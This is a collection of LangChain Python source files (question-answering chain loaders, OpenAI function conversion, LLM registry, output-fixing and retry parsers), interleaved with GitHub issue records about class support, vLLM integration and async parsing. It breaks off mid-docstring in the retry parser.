"""Load question answering chains.""" from typing import Any, Mapping, Optional, Protocol from langchain.callbacks.base import BaseCallbackManager from langchain.callbacks.manager import Callbacks from langchain.chains import ReduceDocumentsChain from langchain.chains.combine_documents.base import BaseCombineDocumentsChain from langchain.chains.combine_documents.map_reduce import MapReduceDocumentsChain from langchain.chains.combine_documents.map_rerank import MapRerankDocumentsChain from langchain.chains.combine_documents.refine import RefineDocumentsChain from langchain.chains.combine_documents.stuff import StuffDocumentsChain from langchain.chains.llm import LLMChain from langchain.chains.question_answering import ( map_reduce_prompt, refine_prompts, stuff_prompt, ) from langchain.chains.question_answering.map_rerank_prompt import ( PROMPT as MAP_RERANK_PROMPT, ) from langchain.schema.language_model import BaseLanguageModel from langchain.schema.prompt_template import BasePromptTemplate class LoadingCallable(Protocol): """Interface for loading the combine documents chain.""" def __call__( self, llm: BaseLanguageModel, **kwargs: Any ) -> BaseCombineDocumentsChain: """Callable to load the combine documents chain.""" def _load_map_rerank_chain( llm: BaseLanguageModel, prompt: BasePromptTemplate = MAP_RERANK_PROMPT, verbose: bool = False, document_variable_name: str = "context", rank_key: str = "score", answer_key: str = "answer", callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, **kwargs: Any, ) -> MapRerankDocumentsChain: llm_chain = LLMChain( llm=llm, prompt=prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) return MapRerankDocumentsChain( llm_chain=llm_chain, rank_key=rank_key, answer_key=answer_key, document_variable_name=document_variable_name, verbose=verbose, callback_manager=callback_manager, **kwargs, ) def _load_stuff_chain( llm: BaseLanguageModel, prompt: Optional[BasePromptTemplate] = None, document_variable_name: str = "context", verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, **kwargs: Any, ) -> StuffDocumentsChain: _prompt = prompt or stuff_prompt.PROMPT_SELECTOR.get_prompt(llm) llm_chain = LLMChain( llm=llm, prompt=_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) # TODO: document prompt return StuffDocumentsChain( llm_chain=llm_chain, document_variable_name=document_variable_name, verbose=verbose, callback_manager=callback_manager, **kwargs, ) def _load_map_reduce_chain( llm: BaseLanguageModel, question_prompt: Optional[BasePromptTemplate] = None, combine_prompt: Optional[BasePromptTemplate] = None, combine_document_variable_name: str = "summaries", map_reduce_document_variable_name: str = "context", collapse_prompt: Optional[BasePromptTemplate] = None, reduce_llm: Optional[BaseLanguageModel] = None, collapse_llm: Optional[BaseLanguageModel] = None, verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, token_max: int = 3000, **kwargs: Any, ) -> MapReduceDocumentsChain: _question_prompt = ( question_prompt or map_reduce_prompt.QUESTION_PROMPT_SELECTOR.get_prompt(llm) ) _combine_prompt = ( combine_prompt or map_reduce_prompt.COMBINE_PROMPT_SELECTOR.get_prompt(llm) ) map_chain = LLMChain( llm=llm, prompt=_question_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) _reduce_llm = reduce_llm or llm reduce_chain = LLMChain( llm=_reduce_llm, prompt=_combine_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) # TODO: document prompt combine_documents_chain = StuffDocumentsChain( llm_chain=reduce_chain, document_variable_name=combine_document_variable_name, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) if collapse_prompt is None: collapse_chain = None if collapse_llm is not None: raise ValueError( "collapse_llm provided, but collapse_prompt was not: please " "provide one or stop providing collapse_llm." ) else: _collapse_llm = collapse_llm or llm collapse_chain = StuffDocumentsChain( llm_chain=LLMChain( llm=_collapse_llm, prompt=collapse_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ), document_variable_name=combine_document_variable_name, verbose=verbose, callback_manager=callback_manager, ) reduce_documents_chain = ReduceDocumentsChain( combine_documents_chain=combine_documents_chain, collapse_documents_chain=collapse_chain, token_max=token_max, verbose=verbose, ) return MapReduceDocumentsChain( llm_chain=map_chain, document_variable_name=map_reduce_document_variable_name, reduce_documents_chain=reduce_documents_chain, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, **kwargs, ) def _load_refine_chain( llm: BaseLanguageModel, question_prompt: Optional[BasePromptTemplate] = None, refine_prompt: Optional[BasePromptTemplate] = None, document_variable_name: str = "context_str", initial_response_name: str = "existing_answer", refine_llm: Optional[BaseLanguageModel] = None, verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, callbacks: Callbacks = None, **kwargs: Any, ) -> RefineDocumentsChain: _question_prompt = ( question_prompt or refine_prompts.QUESTION_PROMPT_SELECTOR.get_prompt(llm) ) _refine_prompt = refine_prompt or refine_prompts.REFINE_PROMPT_SELECTOR.get_prompt( llm ) initial_chain = LLMChain( llm=llm, prompt=_question_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) _refine_llm = refine_llm or llm refine_chain = LLMChain( llm=_refine_llm, prompt=_refine_prompt, verbose=verbose, callback_manager=callback_manager, callbacks=callbacks, ) return RefineDocumentsChain( initial_llm_chain=initial_chain, refine_llm_chain=refine_chain, document_variable_name=document_variable_name, initial_response_name=initial_response_name, verbose=verbose, callback_manager=callback_manager, **kwargs, ) def load_qa_chain( llm: BaseLanguageModel, chain_type: str = "stuff", verbose: Optional[bool] = None, callback_manager: Optional[BaseCallbackManager] = None, **kwargs: Any, ) -> BaseCombineDocumentsChain: """Load question answering chain. Args: llm: Language Model to use in the chain. chain_type: Type of document combining chain to use. Should be one of "stuff", "map_reduce", "map_rerank", and "refine". verbose: Whether chains should be run in verbose mode or not. Note that this applies to all chains that make up the final chain. callback_manager: Callback manager to use for the chain. Returns: A chain to use for question answering. """ loader_mapping: Mapping[str, LoadingCallable] = { "stuff": _load_stuff_chain, "map_reduce": _load_map_reduce_chain, "refine": _load_refine_chain, "map_rerank": _load_map_rerank_chain, } if chain_type not in loader_mapping: raise ValueError( f"Got unsupported chain type: {chain_type}. " f"Should be one of {loader_mapping.keys()}" ) return loader_mapping[chain_type]( llm, verbose=verbose, callback_manager=callback_manager, **kwargs )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,616
_get_python_function_name does not work with classes
### System Info LangChain : v0.0.231 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction # Issue `convert_to_openai_function` does not work as intended: - Classes are not supported - Any function without its source is not supported # Reproduce ```python from dataclasses import dataclass from langchain.chains.openai_functions.base import ( convert_to_openai_function, ) @dataclass class System: name: str ram: int convert_to_openai_function(System) ``` ### Expected behavior When calling `langchain.chains.openai_functions.base.convert_to_openai_function`, the subsequent call to `_get_python_function_name` fails because it tries to read source code (and cannot find it). Something much simpler would be to access the `__name__` attribute of the callable.
https://github.com/langchain-ai/langchain/issues/7616
https://github.com/langchain-ai/langchain/pull/7617
797c9e92c82f8e843b321ec2167bb1678ced03cf
4a7ebb7184fa5dad4cdfef49d1eab2a3e9029a2b
"2023-07-12T21:03:09Z"
python
"2023-08-06T22:12:03Z"
libs/langchain/langchain/chains/openai_functions/base.py
"""Methods for creating chains that use OpenAI function-calling APIs.""" import inspect import re from typing import Any, Callable, Dict, List, Optional, Sequence, Tuple, Type, Union from pydantic import BaseModel from langchain.base_language import BaseLanguageModel from langchain.chains import LLMChain from langchain.output_parsers.openai_functions import ( JsonOutputFunctionsParser, PydanticAttrOutputFunctionsParser, PydanticOutputFunctionsParser, ) from langchain.prompts import BasePromptTemplate from langchain.schema import BaseLLMOutputParser PYTHON_TO_JSON_TYPES = { "str": "string", "int": "number", "float": "number", "bool": "boolean", } def _get_python_function_name(function: Callable) -> str: """Get the name of a Python function.""" source = inspect.getsource(function) return re.search(r"^def (.*)\(", source).groups()[0] # type: ignore def _parse_python_function_docstring(function: Callable) -> Tuple[str, dict]: """Parse the function and argument descriptions from the docstring of a function. Assumes the function docstring follows Google Python style guide. """ docstring = inspect.getdoc(function) if docstring: docstring_blocks = docstring.split("\n\n") descriptors = [] args_block = None past_descriptors = False for block in docstring_blocks: if block.startswith("Args:"): args_block = block break elif block.startswith("Returns:") or block.startswith("Example:"): # Don't break in case Args come after past_descriptors = True elif not past_descriptors: descriptors.append(block) else: continue description = " ".join(descriptors) else: description = "" args_block = None arg_descriptions = {} if args_block: arg = None for line in args_block.split("\n")[1:]: if ":" in line: arg, desc = line.split(":") arg_descriptions[arg.strip()] = desc.strip() elif arg: arg_descriptions[arg.strip()] += " " + line.strip() return description, arg_descriptions def _get_python_function_arguments(function: Callable, arg_descriptions: dict) -> dict: """Get JsonSchema describing a Python functions arguments. Assumes all function arguments are of primitive types (int, float, str, bool) or are subclasses of pydantic.BaseModel. """ properties = {} annotations = inspect.getfullargspec(function).annotations for arg, arg_type in annotations.items(): if arg == "return": continue if isinstance(arg_type, type) and issubclass(arg_type, BaseModel): properties[arg] = arg_type.schema() elif arg_type.__name__ in PYTHON_TO_JSON_TYPES: properties[arg] = {"type": PYTHON_TO_JSON_TYPES[arg_type.__name__]} if arg in arg_descriptions: if arg not in properties: properties[arg] = {} properties[arg]["description"] = arg_descriptions[arg] return properties def _get_python_function_required_args(function: Callable) -> List[str]: """Get the required arguments for a Python function.""" spec = inspect.getfullargspec(function) required = spec.args[: -len(spec.defaults)] if spec.defaults else spec.args required += [k for k in spec.kwonlyargs if k not in (spec.kwonlydefaults or {})] return required def convert_python_function_to_openai_function(function: Callable) -> Dict[str, Any]: """Convert a Python function to an OpenAI function-calling API compatible dict. Assumes the Python function has type hints and a docstring with a description. If the docstring has Google Python style argument descriptions, these will be included as well. """ description, arg_descriptions = _parse_python_function_docstring(function) return { "name": _get_python_function_name(function), "description": description, "parameters": { "type": "object", "properties": _get_python_function_arguments(function, arg_descriptions), "required": _get_python_function_required_args(function), }, } def convert_to_openai_function( function: Union[Dict[str, Any], Type[BaseModel], Callable] ) -> Dict[str, Any]: """Convert a raw function/class to an OpenAI function. Args: function: Either a dictionary, a pydantic.BaseModel class, or a Python function. If a dictionary is passed in, it is assumed to already be a valid OpenAI function. Returns: A dict version of the passed in function which is compatible with the OpenAI function-calling API. """ if isinstance(function, dict): return function elif isinstance(function, type) and issubclass(function, BaseModel): schema = function.schema() return { "name": schema["title"], "description": schema["description"], "parameters": schema, } elif callable(function): return convert_python_function_to_openai_function(function) else: raise ValueError( f"Unsupported function type {type(function)}. Functions must be passed in" f" as Dict, pydantic.BaseModel, or Callable." ) def _get_openai_output_parser( functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]], function_names: Sequence[str], ) -> BaseLLMOutputParser: """Get the appropriate function output parser given the user functions.""" if isinstance(functions[0], type) and issubclass(functions[0], BaseModel): if len(functions) > 1: pydantic_schema: Union[Dict, Type[BaseModel]] = { name: fn for name, fn in zip(function_names, functions) } else: pydantic_schema = functions[0] output_parser: BaseLLMOutputParser = PydanticOutputFunctionsParser( pydantic_schema=pydantic_schema ) else: output_parser = JsonOutputFunctionsParser(args_only=len(functions) <= 1) return output_parser def create_openai_fn_chain( functions: Sequence[Union[Dict[str, Any], Type[BaseModel], Callable]], llm: BaseLanguageModel, prompt: BasePromptTemplate, *, output_parser: Optional[BaseLLMOutputParser] = None, **kwargs: Any, ) -> LLMChain: """Create an LLM chain that uses OpenAI functions. Args: functions: A sequence of either dictionaries, pydantic.BaseModels classes, or Python functions. If dictionaries are passed in, they are assumed to already be a valid OpenAI functions. If only a single function is passed in, then it will be enforced that the model use that function. pydantic.BaseModels and Python functions should have docstrings describing what the function does. For best results, pydantic.BaseModels should have descriptions of the parameters and Python functions should have Google Python style args descriptions in the docstring. Additionally, Python functions should only use primitive types (str, int, float, bool) or pydantic.BaseModels for arguments. llm: Language model to use, assumed to support the OpenAI function-calling API. prompt: BasePromptTemplate to pass to the model. output_parser: BaseLLMOutputParser to use for parsing model outputs. By default will be inferred from the function types. If pydantic.BaseModels are passed in, then the OutputParser will try to parse outputs using those. Otherwise model outputs will simply be parsed as JSON. If multiple functions are passed in and they are not pydantic.BaseModels, the chain output will include both the name of the function that was returned and the arguments to pass to the function. Returns: An LLMChain that will pass in the given functions to the model when run. Example: .. code-block:: python from langchain.chains.openai_functions import create_openai_fn_chain from langchain.chat_models import ChatOpenAI from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate from pydantic import BaseModel, Field class RecordPerson(BaseModel): \"\"\"Record some identifying information about a person.\"\"\" name: str = Field(..., description="The person's name") age: int = Field(..., description="The person's age") fav_food: Optional[str] = Field(None, description="The person's favorite food") class RecordDog(BaseModel): \"\"\"Record some identifying information about a dog.\"\"\" name: str = Field(..., description="The dog's name") color: str = Field(..., description="The dog's color") fav_food: Optional[str] = Field(None, description="The dog's favorite food") llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0) prompt_msgs = [ SystemMessage( content="You are a world class algorithm for recording entities" ), HumanMessage(content="Make calls to the relevant function to record the entities in the following input:"), HumanMessagePromptTemplate.from_template("{input}"), HumanMessage(content="Tips: Make sure to answer in the correct format"), ] prompt = ChatPromptTemplate(messages=prompt_msgs) chain = create_openai_fn_chain([RecordPerson, RecordDog]) chain.run("Harry was a chubby brown beagle who loved chicken") # -> RecordDog(name="Harry", color="brown", fav_food="chicken") """ # noqa: E501 if not functions: raise ValueError("Need to pass in at least one function. Received zero.") openai_functions = [convert_to_openai_function(f) for f in functions] fn_names = [oai_fn["name"] for oai_fn in openai_functions] output_parser = output_parser or _get_openai_output_parser(functions, fn_names) llm_kwargs: Dict[str, Any] = { "functions": openai_functions, } if len(openai_functions) == 1: llm_kwargs["function_call"] = {"name": openai_functions[0]["name"]} llm_chain = LLMChain( llm=llm, prompt=prompt, output_parser=output_parser, llm_kwargs=llm_kwargs, output_key="function", **kwargs, ) return llm_chain def create_structured_output_chain( output_schema: Union[Dict[str, Any], Type[BaseModel]], llm: BaseLanguageModel, prompt: BasePromptTemplate, *, output_parser: Optional[BaseLLMOutputParser] = None, **kwargs: Any, ) -> LLMChain: """Create an LLMChain that uses an OpenAI function to get a structured output. Args: output_schema: Either a dictionary or pydantic.BaseModel class. If a dictionary is passed in, it's assumed to already be a valid JsonSchema. For best results, pydantic.BaseModels should have docstrings describing what the schema represents and descriptions for the parameters. llm: Language model to use, assumed to support the OpenAI function-calling API. prompt: BasePromptTemplate to pass to the model. output_parser: BaseLLMOutputParser to use for parsing model outputs. By default will be inferred from the function types. If pydantic.BaseModels are passed in, then the OutputParser will try to parse outputs using those. Otherwise model outputs will simply be parsed as JSON. Returns: An LLMChain that will pass the given function to the model. Example: .. code-block:: python from langchain.chains.openai_functions import create_structured_output_chain from langchain.chat_models import ChatOpenAI from langchain.prompts import ChatPromptTemplate, HumanMessagePromptTemplate from pydantic import BaseModel, Field class Dog(BaseModel): \"\"\"Identifying information about a dog.\"\"\" name: str = Field(..., description="The dog's name") color: str = Field(..., description="The dog's color") fav_food: Optional[str] = Field(None, description="The dog's favorite food") llm = ChatOpenAI(model="gpt-3.5-turbo-0613", temperature=0) prompt_msgs = [ SystemMessage( content="You are a world class algorithm for extracting information in structured formats." ), HumanMessage(content="Use the given format to extract information from the following input:"), HumanMessagePromptTemplate.from_template("{input}"), HumanMessage(content="Tips: Make sure to answer in the correct format"), ] prompt = ChatPromptTemplate(messages=prompt_msgs) chain = create_structured_output_chain(Dog, llm, prompt) chain.run("Harry was a chubby brown beagle who loved chicken") # -> Dog(name="Harry", color="brown", fav_food="chicken") """ # noqa: E501 if isinstance(output_schema, dict): function: Any = { "name": "output_formatter", "description": ( "Output formatter. Should always be used to format your response to the" " user." ), "parameters": output_schema, } else: class _OutputFormatter(BaseModel): """Output formatter. Should always be used to format your response to the user.""" # noqa: E501 output: output_schema # type: ignore function = _OutputFormatter output_parser = output_parser or PydanticAttrOutputFunctionsParser( pydantic_schema=_OutputFormatter, attr_name="output" ) return create_openai_fn_chain( [function], llm, prompt, output_parser=output_parser, **kwargs )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,729
VLLM
### Feature request can we please get vllm support for faster inference ### Motivation faster inference speed compared to using hugging face pipeline ### Your contribution n/a
https://github.com/langchain-ai/langchain/issues/8729
https://github.com/langchain-ai/langchain/pull/8806
100d9ce4c7b55db0c9df973a26bbc18d5ad5800c
a616e19975796ff6e3cde24597ba90eee714d57a
"2023-08-04T00:45:38Z"
python
"2023-08-07T14:32:02Z"
docs/extras/integrations/llms/vllm.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,729
VLLM
### Feature request can we please get vllm support for faster inference ### Motivation faster inference speed compared to using hugging face pipeline ### Your contribution n/a
https://github.com/langchain-ai/langchain/issues/8729
https://github.com/langchain-ai/langchain/pull/8806
100d9ce4c7b55db0c9df973a26bbc18d5ad5800c
a616e19975796ff6e3cde24597ba90eee714d57a
"2023-08-04T00:45:38Z"
python
"2023-08-07T14:32:02Z"
libs/langchain/langchain/llms/__init__.py
""" **LLM** classes provide access to the large language model (**LLM**) APIs and services. **Class hierarchy:** .. code-block:: BaseLanguageModel --> BaseLLM --> LLM --> <name> # Examples: AI21, HuggingFaceHub, OpenAI **Main helpers:** .. code-block:: LLMResult, PromptValue, CallbackManagerForLLMRun, AsyncCallbackManagerForLLMRun, CallbackManager, AsyncCallbackManager, AIMessage, BaseMessage """ # noqa: E501 from typing import Dict, Type from langchain.llms.ai21 import AI21 from langchain.llms.aleph_alpha import AlephAlpha from langchain.llms.amazon_api_gateway import AmazonAPIGateway from langchain.llms.anthropic import Anthropic from langchain.llms.anyscale import Anyscale from langchain.llms.aviary import Aviary from langchain.llms.azureml_endpoint import AzureMLOnlineEndpoint from langchain.llms.bananadev import Banana from langchain.llms.base import BaseLLM from langchain.llms.baseten import Baseten from langchain.llms.beam import Beam from langchain.llms.bedrock import Bedrock from langchain.llms.cerebriumai import CerebriumAI from langchain.llms.chatglm import ChatGLM from langchain.llms.clarifai import Clarifai from langchain.llms.cohere import Cohere from langchain.llms.ctransformers import CTransformers from langchain.llms.databricks import Databricks from langchain.llms.deepinfra import DeepInfra from langchain.llms.edenai import EdenAI from langchain.llms.fake import FakeListLLM from langchain.llms.fireworks import Fireworks, FireworksChat from langchain.llms.forefrontai import ForefrontAI from langchain.llms.google_palm import GooglePalm from langchain.llms.gooseai import GooseAI from langchain.llms.gpt4all import GPT4All from langchain.llms.huggingface_endpoint import HuggingFaceEndpoint from langchain.llms.huggingface_hub import HuggingFaceHub from langchain.llms.huggingface_pipeline import HuggingFacePipeline from langchain.llms.huggingface_text_gen_inference import HuggingFaceTextGenInference from langchain.llms.human import HumanInputLLM from langchain.llms.koboldai import KoboldApiLLM from langchain.llms.llamacpp import LlamaCpp from langchain.llms.manifest import ManifestWrapper from langchain.llms.minimax import Minimax from langchain.llms.mlflow_ai_gateway import MlflowAIGateway from langchain.llms.modal import Modal from langchain.llms.mosaicml import MosaicML from langchain.llms.nlpcloud import NLPCloud from langchain.llms.octoai_endpoint import OctoAIEndpoint from langchain.llms.openai import AzureOpenAI, OpenAI, OpenAIChat from langchain.llms.openllm import OpenLLM from langchain.llms.openlm import OpenLM from langchain.llms.petals import Petals from langchain.llms.pipelineai import PipelineAI from langchain.llms.predibase import Predibase from langchain.llms.predictionguard import PredictionGuard from langchain.llms.promptlayer_openai import PromptLayerOpenAI, PromptLayerOpenAIChat from langchain.llms.replicate import Replicate from langchain.llms.rwkv import RWKV from langchain.llms.sagemaker_endpoint import SagemakerEndpoint from langchain.llms.self_hosted import SelfHostedPipeline from langchain.llms.self_hosted_hugging_face import SelfHostedHuggingFaceLLM from langchain.llms.stochasticai import StochasticAI from langchain.llms.textgen import TextGen from langchain.llms.tongyi import Tongyi from langchain.llms.vertexai import VertexAI from langchain.llms.writer import Writer from langchain.llms.xinference import Xinference __all__ = [ "AI21", "AlephAlpha", "AmazonAPIGateway", "Anthropic", "Anyscale", "Aviary", "AzureMLOnlineEndpoint", "AzureOpenAI", "Banana", "Baseten", "Beam", "Bedrock", "CTransformers", "CerebriumAI", "ChatGLM", "Clarifai", "Cohere", "Databricks", "DeepInfra", "EdenAI", "FakeListLLM", "Fireworks", "FireworksChat", "ForefrontAI", "GPT4All", "GooglePalm", "GooseAI", "HuggingFaceEndpoint", "HuggingFaceHub", "HuggingFacePipeline", "HuggingFaceTextGenInference", "HumanInputLLM", "KoboldApiLLM", "LlamaCpp", "TextGen", "ManifestWrapper", "Minimax", "MlflowAIGateway", "Modal", "MosaicML", "NLPCloud", "OpenAI", "OpenAIChat", "OpenLLM", "OpenLM", "Petals", "PipelineAI", "Predibase", "PredictionGuard", "PromptLayerOpenAI", "PromptLayerOpenAIChat", "RWKV", "Replicate", "SagemakerEndpoint", "SelfHostedHuggingFaceLLM", "SelfHostedPipeline", "StochasticAI", "Tongyi", "VertexAI", "Writer", "OctoAIEndpoint", "Xinference", ] type_to_cls_dict: Dict[str, Type[BaseLLM]] = { "ai21": AI21, "aleph_alpha": AlephAlpha, "amazon_api_gateway": AmazonAPIGateway, "amazon_bedrock": Bedrock, "anthropic": Anthropic, "anyscale": Anyscale, "aviary": Aviary, "azure": AzureOpenAI, "azureml_endpoint": AzureMLOnlineEndpoint, "bananadev": Banana, "baseten": Baseten, "beam": Beam, "cerebriumai": CerebriumAI, "chat_glm": ChatGLM, "clarifai": Clarifai, "cohere": Cohere, "ctransformers": CTransformers, "databricks": Databricks, "deepinfra": DeepInfra, "edenai": EdenAI, "fake-list": FakeListLLM, "forefrontai": ForefrontAI, "google_palm": GooglePalm, "gooseai": GooseAI, "gpt4all": GPT4All, "huggingface_endpoint": HuggingFaceEndpoint, "huggingface_hub": HuggingFaceHub, "huggingface_pipeline": HuggingFacePipeline, "huggingface_textgen_inference": HuggingFaceTextGenInference, "human-input": HumanInputLLM, "koboldai": KoboldApiLLM, "llamacpp": LlamaCpp, "textgen": TextGen, "minimax": Minimax, "mlflow-ai-gateway": MlflowAIGateway, "modal": Modal, "mosaic": MosaicML, "nlpcloud": NLPCloud, "openai": OpenAI, "openlm": OpenLM, "petals": Petals, "pipelineai": PipelineAI, "predibase": Predibase, "replicate": Replicate, "rwkv": RWKV, "sagemaker_endpoint": SagemakerEndpoint, "self_hosted": SelfHostedPipeline, "self_hosted_hugging_face": SelfHostedHuggingFaceLLM, "stochasticai": StochasticAI, "tongyi": Tongyi, "vertexai": VertexAI, "openllm": OpenLLM, "openllm_client": OpenLLM, "writer": Writer, "xinference": Xinference, }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,729
VLLM
### Feature request can we please get vllm support for faster inference ### Motivation faster inference speed compared to using hugging face pipeline ### Your contribution n/a
https://github.com/langchain-ai/langchain/issues/8729
https://github.com/langchain-ai/langchain/pull/8806
100d9ce4c7b55db0c9df973a26bbc18d5ad5800c
a616e19975796ff6e3cde24597ba90eee714d57a
"2023-08-04T00:45:38Z"
python
"2023-08-07T14:32:02Z"
libs/langchain/langchain/llms/vllm.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,989
OutputFixingParser is not async
### System Info LangChain Python v0.0.237 Based on this code snippet it appears that OutputFixingParser doesn't support async flows. https://github.com/hwchase17/langchain/blob/df84e1bb64d96377f909651f696f310c43c2f2c5/langchain/output_parsers/fix.py#L46-L52 It's calling the run function and not arun ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction 1. Define async callback handler 2. Make LLM return output that is unparsable (invalid JSON or 2 code blocks) 3. OutputFixingParser will fail parsing the output and throw an exception, which will call the LLM via the run function which doesn't await on coroutines. Python will give the following error: ``` RuntimeWarning: coroutine 'AsyncCallbackHandler.on_chat_model_start' was never awaited ``` ### Expected behavior 1. Should work with coroutines as expected
https://github.com/langchain-ai/langchain/issues/7989
https://github.com/langchain-ai/langchain/pull/8776
cc908d49a3c23e128fab7c89fa45d7cc4114f028
33cdb06b5c9d4d3e7f54d5e1e7c980dfae33923b
"2023-07-20T08:29:12Z"
python
"2023-08-07T21:42:48Z"
libs/langchain/langchain/output_parsers/fix.py
from __future__ import annotations from typing import TypeVar from langchain.chains.llm import LLMChain from langchain.output_parsers.prompts import NAIVE_FIX_PROMPT from langchain.schema import BaseOutputParser, BasePromptTemplate, OutputParserException from langchain.schema.language_model import BaseLanguageModel T = TypeVar("T") class OutputFixingParser(BaseOutputParser[T]): """Wraps a parser and tries to fix parsing errors.""" @property def lc_serializable(self) -> bool: return True parser: BaseOutputParser[T] retry_chain: LLMChain @classmethod def from_llm( cls, llm: BaseLanguageModel, parser: BaseOutputParser[T], prompt: BasePromptTemplate = NAIVE_FIX_PROMPT, ) -> OutputFixingParser[T]: """Create an OutputFixingParser from a language model and a parser. Args: llm: llm to use for fixing parser: parser to use for parsing prompt: prompt to use for fixing Returns: OutputFixingParser """ chain = LLMChain(llm=llm, prompt=prompt) return cls(parser=parser, retry_chain=chain) def parse(self, completion: str) -> T: try: parsed_completion = self.parser.parse(completion) except OutputParserException as e: new_completion = self.retry_chain.run( instructions=self.parser.get_format_instructions(), completion=completion, error=repr(e), ) parsed_completion = self.parser.parse(new_completion) return parsed_completion def get_format_instructions(self) -> str: return self.parser.get_format_instructions() @property def _type(self) -> str: return "output_fixing"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,989
OutputFixingParser is not async
### System Info LangChain Python v0.0.237 Based on this code snippet it appears that OutputFixingParser doesn't support async flows. https://github.com/hwchase17/langchain/blob/df84e1bb64d96377f909651f696f310c43c2f2c5/langchain/output_parsers/fix.py#L46-L52 It's calling the run function and not arun ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction 1. Define async callback handler 2. Make LLM return output that is unparsable (invalid JSON or 2 code blocks) 3. OutputFixingParser will fail parsing the output and throw an exception, which will call the LLM via the run function which doesn't await on coroutines. Python will give the following error: ``` RuntimeWarning: coroutine 'AsyncCallbackHandler.on_chat_model_start' was never awaited ``` ### Expected behavior 1. Should work with coroutines as expected
https://github.com/langchain-ai/langchain/issues/7989
https://github.com/langchain-ai/langchain/pull/8776
cc908d49a3c23e128fab7c89fa45d7cc4114f028
33cdb06b5c9d4d3e7f54d5e1e7c980dfae33923b
"2023-07-20T08:29:12Z"
python
"2023-08-07T21:42:48Z"
libs/langchain/langchain/output_parsers/retry.py
from __future__ import annotations from typing import TypeVar from langchain.chains.llm import LLMChain from langchain.prompts.prompt import PromptTemplate from langchain.schema import ( BaseOutputParser, BasePromptTemplate, OutputParserException, PromptValue, ) from langchain.schema.language_model import BaseLanguageModel NAIVE_COMPLETION_RETRY = """Prompt: {prompt} Completion: {completion} Above, the Completion did not satisfy the constraints given in the Prompt. Please try again:""" NAIVE_COMPLETION_RETRY_WITH_ERROR = """Prompt: {prompt} Completion: {completion} Above, the Completion did not satisfy the constraints given in the Prompt. Details: {error} Please try again:""" NAIVE_RETRY_PROMPT = PromptTemplate.from_template(NAIVE_COMPLETION_RETRY) NAIVE_RETRY_WITH_ERROR_PROMPT = PromptTemplate.from_template( NAIVE_COMPLETION_RETRY_WITH_ERROR ) T = TypeVar("T") class RetryOutputParser(BaseOutputParser[T]): """Wraps a parser and tries to fix parsing errors. Does this by passing the original prompt and the completion to another LLM, and telling it the completion did not satisfy criteria in the prompt. """ parser: BaseOutputParser[T] """The parser to use to parse the output.""" retry_chain: LLMChain """The LLMChain to use to retry the completion.""" @classmethod def from_llm( cls, llm: BaseLanguageModel, parser: BaseOutputParser[T], prompt: BasePromptTemplate = NAIVE_RETRY_PROMPT, ) -> RetryOutputParser[T]: chain = LLMChain(llm=llm, prompt=prompt) return cls(parser=parser, retry_chain=chain) def parse_with_prompt(self, completion: str, prompt_value: PromptValue) -> T: """Parse the output of an LLM call using a wrapped parser. Args: completion: The chain completion to parse. prompt_value: The prompt to use to parse the completion. Returns: The parsed completion. """ try: parsed_completion = self.parser.parse(completion) except OutputParserException: new_completion = self.retry_chain.run( prompt=prompt_value.to_string(), completion=completion ) parsed_completion = self.parser.parse(new_completion) return parsed_completion def parse(self, completion: str) -> T: raise NotImplementedError( "This OutputParser can only be called by the `parse_with_prompt` method." ) def get_format_instructions(self) -> str: return self.parser.get_format_instructions() @property def _type(self) -> str: return "retry" class RetryWithErrorOutputParser(BaseOutputParser[T]): """Wraps a parser and tries to fix parsing errors. Does this by passing the original prompt, the completion, AND the error that was raised to another language model and telling it that the completion did not work, and raised the given error. Differs from RetryOutputParser in that this implementation provides the error that was raised back to the LLM, which in theory should give it more information on how to fix it. """ parser: BaseOutputParser[T] retry_chain: LLMChain @classmethod def from_llm( cls, llm: BaseLanguageModel, parser: BaseOutputParser[T], prompt: BasePromptTemplate = NAIVE_RETRY_WITH_ERROR_PROMPT, ) -> RetryWithErrorOutputParser[T]: """Create a RetryWithErrorOutputParser from an LLM. Args: llm: The 